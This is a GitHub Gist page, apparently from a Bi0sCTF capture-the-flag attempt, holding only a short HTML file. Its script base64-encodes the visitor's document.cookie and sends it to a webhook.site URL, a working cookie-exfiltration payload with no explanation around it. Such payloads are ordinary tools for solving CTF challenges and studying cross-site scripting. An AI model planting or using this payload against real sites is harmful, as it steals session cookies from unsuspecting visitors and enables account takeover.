Skip to content

Instantly share code, notes, and snippets.

View lebathang's full-sized avatar
🏫
studying at Vietnam - Korea University

TH4N6_N3K lebathang

🏫
studying at Vietnam - Korea University
View GitHub Profile
@lebathang
lebathang / flag
Created June 8, 2025 10:11
Bi0sCTF
<!DOCTYPE html>
<html>
<body>
<script>
fetch(' https://webhook.site/e556ad50-cae6-4277-b26e-c3298d65b967?data=' + btoa(document.cookie));
</script>
</body>
</html>